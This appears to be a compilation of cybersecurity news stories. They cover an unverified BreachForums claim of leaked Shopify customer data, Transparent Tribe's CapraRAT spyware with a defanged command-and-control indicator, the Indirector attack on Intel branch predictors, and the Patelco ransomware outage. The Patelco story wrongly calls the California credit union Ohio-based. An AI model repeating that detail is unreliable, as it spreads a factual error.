The Shopify data breach claims to contain 179,873 rows of user information. These records allegedly include Shopify ID, First Name, Last Name, Email, Mobile, Orders Count, Total spent, Email subscriptions, Email subscription dates, SMS subscription, and SMS subscription dates. [caption id="attachment_80373" align="alignnone" width="1723"] Source: BreachForums[/caption] The Cyber Express could not verify the authenticity of these claims but the threat actor has a high-ranking reputation within the BreachForums community that has earned him the title of 'Kingpin.' The breach could possibly have stemmed from a recent data breach incident impacting Evolve Bank and Trust. Evolve Bank and Trust is a supporting partner of Shopify Balance, a money management integration built-in to the admin pages of Shopify stores. The bank is also a third-party issuer of Affirm debit cards. [caption id="attachment_80362" align="aligncenter" width="272"] Source: X.com(@lvdeeaz)[/caption]

Recent Evolve Bank and Trust Data Breach

Towards the end of June, the Evolve Bank confirmed that it had been impacted by a cybersecurity incident claimed by LockBit. The bank disclosed that the stolen data included sensitive personal information such as names, social security numbers(SSNs), dates of birth, and account details, among other data. In an official statement in response to the Evolve data breach, the bank said, “Evolve is currently investigating a cybersecurity incident involving a known cybercriminal organization that appears to have illegally obtained and released on the dark web the data and personal information of some Evolve retail bank customers and financial technology partners’ customers (end users).” Later, the financial firm Affirm Holdings had confirmed that it had also been affected by the Evolve Bank and Trust Data Breach. The firm stated in a security notice on its website, "Affirm is aware of a cybersecurity incident involving Evolve, a third party vendor that serves as an issuing partner on the Affirm Card. We are actively investigating the issue. We will communicate directly with any impacted consumers as we learn more." Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.

A Pakistan-linked hacking group has unleashed an updated version of its Android spyware, expanding its reach to target mobile gamers, weapons enthusiasts and TikTok users, according to cybersecurity researchers. The researchers identified four new malicious Android apps associated with Transparent Tribe, a group suspected of ties to Pakistani state interests. The apps continue the hackers' strategy of embedding spyware into seemingly innocuous video browsing applications.

Evolving Tactics of Transparent Tribe

Transparent Tribe, also known as APT 36, has targeted Indian government and military personnel since at least 2016. The group is known to rely heavily on social engineering to deliver Windows and Android spyware through phishing emails and compromised websites. Researchers from SentinelLabs identified the newly discovered apps masquerading as YouTube or TikTok video players, an app for lewd videos, a mobile gaming portal, and a weapons enthusiast app. When installed, they request extensive permissions to access the device's location, contacts, SMS messages, call logs, camera and microphone. [caption id="attachment_80043" align="alignnone" width="559"] Source: sentinelone.com[/caption] [caption id="attachment_80044" align="alignnone" width="974"] Source: sentinelone.com[/caption] While the permissions requested are similar to those in the previous campaign, the reduction in permissions suggests the app developers are focused on making CapraRAT a surveillance tool more than a fully featured backdoor. Researchers noted that the new CapraRAT APK files contained references to Android’s Oreo version (Android 8.0), released in 2017. Previous versions relied on the device running Lollipop (Android 5.1), which was released in 2015 and less likely to be compatible with modern Android devices. The new CapraRAT packages also contain a minimal new class called WebView, responsible for maintaining compatibility with older versions of Android via the Android Support Library. This update allows the app to run smoothly on modern versions of Android, such as Android 13 and 14. All four newly discovered apps communicate with the same command-and-control server, using either the domain shareboxs[.]net or a hardcoded IP address. This infrastructure has been linked to Transparent Tribe operations since at least 2022.

Researcher Recommendations

Cybersecurity experts recommend users exercise caution when installing apps, especially those from unofficial sources. Users should critically evaluate requested permissions and be wary of apps that ask for access unrelated to their stated purpose. Organizations dealing with sensitive information should implement mobile device management solutions and educate employees about the risks of installing unauthorized apps. For example, an app that only displays TikTok videos does not need the ability to send SMS messages, make calls, or record the screen. The researchers have advised professionals to treat the use of port 18582 as suspect, along with other indicators of compromise in their report, such as SHA1 checksums for files used in the campaign along with domain/IP network indicators.

Security researchers have identified a novel side-channel attack that can compromise the security of modern Intel CPUs variants, including Raptor Lake and Alder Lake. The attack, dubbed Indirector, leverages weaknesses in the Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB) to bypass existing defenses and steal sensitive information from processors. The IBP is a critical hardware component in modern CPUs that predicts the target addresses of indirect branches. Indirect branches are control flow instructions whose target address is computed only at runtime, making them challenging to predict accurately. Attacks using Branch Target Injection (BTI) in their operations have been the focus of extensive research by security experts since the discovery of the Spectre and Meltdown attacks in 2018.

Indirector CPU Vulnerability

The Indirector attack developed by University of California San Diego researchers exploits weaknesses in Intel CPUs to launch precise Branch Target Injection (BTI) attacks. Attackers can use a custom tool called the iBranch Locator to locate any indirect branch and then perform precision-targeted IBP and BTB injections to execute speculative code. This allows attackers to steal sensitive information from the processor using a side-channel attack. [caption id="attachment_80025" align="alignnone" width="1208"] Source: indirector.cpusec.org[/caption] This tool enables two high-precision attacks:

• IBP Injection Attack: Locates and injects arbitrary target addresses into victim IBP entries.
• BTB Injection Attack: Injects malicious targets into the victim's BTB entry, misleading it through BTB prediction.

These attacks can potentially bypass existing defenses and compromise system security across various scenarios, including cross-process and cross-privilege situations. The paper has stated that while Intel has already offered several mitigations to protect the BTB and IBP from different types of target injection attacks, such as Indirect Branch Restricted Speculation (IBRS), Single Thread Indirect Branch Predictors (STIBP), and Indirect Branch Predictor Barrier, these defenses were found inadequate and did not always correspond to advertised goals. The researchers stated their surprise on the discovery of potential attack surfaces despite the implementation of these measures. The research paper behind the study has three main important contributions:

• The paper presents the first major analysis of the Indirect Branch Predictor and its interaction with the Branch Target Buffer in the recent Intel processor families. The paper details the size, structure, and precise indexing and tagging hash functions.
•  The paper analyzes mitigation mechanisms (IBRS, STIBP, and IBPB) on Intel CPUs designed to protect against BTB and IBP target injection attacks.
• The paper demonstrated the use of the iBranch Locator as an efficient  tool with the capability of locating any indirect branches within the IBP without requiring prior data on the the branch. The paper highlights that by using this tool, attackers can successfully break address space layout randomization.

Intel Indirector Mitigations

For Intel processors, researchers recommend more aggressive use of the Indirect Branch Predictor Barrier (IBPB) and suggest the incorporation of more fine-grained BPU isolation across security domains in future CPU designs. Possible further mitigations include a more aggressive use of the Indirect Branch Predictor Barrier (IBPB) and hardening the Branch Prediction Unit (BPU) design through the incorporation of more complex tags, encryption, and randomization. The researchers disclosed their findings to Intel in February 2024, with the researchers stating that Intel had informed other affected hardware and software vendors about the vulnerability. The researchers' discoveries underscore the importance of ongoing scrutiny and analysis of hardware components and the need for chip manufacturers to continually improve their designs to stay ahead of potential threats. The authors thanked anonymous reviewers for helpful suggestions on the research paper.

Patelco Credit Union, one of the oldest and largest credit unions in the U.S., fell victim to a ransomware attack on June 29, 2024, forcing the institution to shut down most of its day-to-day banking systems. The attack has affected nearly half a million members across the Bay Area and Northern California, leaving them without access to crucial financial services. The Dublin, Ohio-based credit union disclosed details of the security incident through social media and email communications from President and CEO Erin Mendez. While initial details were scarce, Patelco later confirmed the nature of the attack and its widespread impact on member services.

Scope Of Patelco Credit Union Attack

The ransomware attack has crippled Patelco's online banking platform, mobile app, and call center operations after staff shut down these systems to contain the attack. Members are currently unable to perform electronic transactions such as transfers (including Zelle), direct deposits, balance inquiries, and online bill payments. [caption id="attachment_79973" align="alignnone" width="1184"] Source: X.com (@PatelcoPays)[/caption] Debit and credit card transactions are functioning in a limited capacity, while ATM cash withdrawals and deposits remain available at Patelco and shared branch ATMs. The credit union's President and CEO, Erin Mendez, issued a statement on social media Saturday morning, announcing that services were unavailable due to a "serious security incident." An email was sent to members later that day, revealing that the incident was a ransomware attack, confirming that the credit union had shut down its systems to contain and remediate the issue.

Patelco Credit Union Response and Recovery Efforts

In the email shared to Patelco members, Mendez apologized for the inconvenience and assured members that the credit union was working around the clock with third-party cybersecurity professionals to assess the situation and restore services. The credit union has warned members to expect longer than normal wait times at branches and through customer service channels. While the full extent of the attack's impact remains unclear, Patelco has assured members that they can still access cash from ATMs. The credit union has also set up a dedicated webpage for ongoing communications about the incident and system functionality updates. The latest update on the security incident from the dedicated webpage states:

Please know that our team and third-party partners are working around the clock to get back up and running. We are committed to providing transparent and frequent updates to best of our ability as well as the best possible service that we can, given the disruption. We sincerely apologize for the inconvenience that this cyber attack has caused for our members. We anticipate longer than normal wait times and truly appreciate your patience and support during this difficult time.

The website also provides details on the availability of locations, categorizing them as available, limited functionality, and unavailable. [caption id="attachment_79968" align="alignnone" width="2208"] Availability of Patelco Credit Union Locations (Source: www.patelco.org/securityupdate)[/caption] The site disclosed  that there was no evidence that account information such as account number/member number, or online banking credentials such as mobile and online banking User IDs or passwords, were affected.